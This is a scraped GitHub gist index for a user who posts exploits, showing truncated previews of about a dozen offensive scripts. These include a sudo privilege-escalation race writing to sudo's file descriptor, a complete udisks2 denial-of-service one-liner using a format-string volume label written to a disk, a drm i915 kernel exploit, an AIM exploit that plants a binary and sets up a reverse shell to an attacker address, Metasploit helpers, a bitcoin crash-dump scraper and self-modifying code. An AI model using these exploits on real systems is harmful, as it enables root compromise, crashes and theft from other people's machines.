Skip to content

Instantly share code, notes, and snippets.

😏
Laides, ladies. I'm only here for the 0days.

Marshall Whittaker oxagast

😏
Laides, ladies. I'm only here for the 0days.
Block or report user

Report or block oxagast

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@oxagast
oxagast / sudo-lolwut.log
Last active Jan 16, 2020
I'm pretty sure that shouldn't happen - sudo/useradd '#0'
View sudo-lolwut.log
root@debian-sid-testbed:/home/marshall/ansvif# useradd '#0'
root@debian-sid-testbed:/home/marshall/ansvif# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
@oxagast
oxagast / sudo_erroot.sh
Last active Nov 14, 2019
Write to /etc/sudoers using file descriptor 3 on sudo's process while asking for a pass
View sudo_erroot.sh
# oxagast / Marshall Whittaker
#
# The echo line uses sudoers file format to allow for everyone to
# use the root account and writes it to proc/23423/fd/3 (where
# the number is sudo's process. If you have write access to file
# descriptor 3 it gives you root!
# Cavets: sudo must be running asking for a password at the time.
# you must have write permission to 3.
#
# Race condition between when getting the uid of sudo and the
View server_autopwn.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/base/sessions/scriptable'
require 'msf/base'
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
View makeitrain.sh
#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
# __ _ _ __ ___ __ ____ ____
# / ( \/ )/ _\ / __)/ _\/ ___(_ )
# ( O ) (/ ( (_ / \___ \ )(
# \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed
@oxagast
oxagast / autopreter.pl
Last active Aug 17, 2019
Automatically generate a custom metasploit.rc resource targeted at an address.
View autopreter.pl
#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ($path !~ m/metasploit/) {
print ("err: Your current working directory must be metasploit's.\n");
exit(1);
}
print("autopreter by oxagast\n");
if($#ARGV < 1) {
View udisks2.8.0-DoS.sh
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1
View drm_i915_ktsploit.c
/* */
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */
/* exploit by oxagast */
/* */
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t
View aim_8.0.1.5_reverse.sh
#!/bin/bash
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.
### Marshall Whittaker
ATTACKER="192.168.2.10";
View myself.c
#define __NULLHOLDER
#define __START
/* oxagast */
/* self output metamorphic c code */
/* gcc myself.c -o me && cat myself.c >> me */
/* ./me && md5sum ./me && sleep 1 && ./me && md5sum ./me */
/* d4c6f41bace586e876f31d8d5032bd2e ./me */
/* 9c80c85a49721a1700e0ac2f594bbf86 ./me */
#include <stdio.h>
#include <stdlib.h>
View bermise_fuzz.sh
# bermise_fuzz
# oxagast
mupr="64";
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
binname="$1";
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;
You can’t perform that action at this time.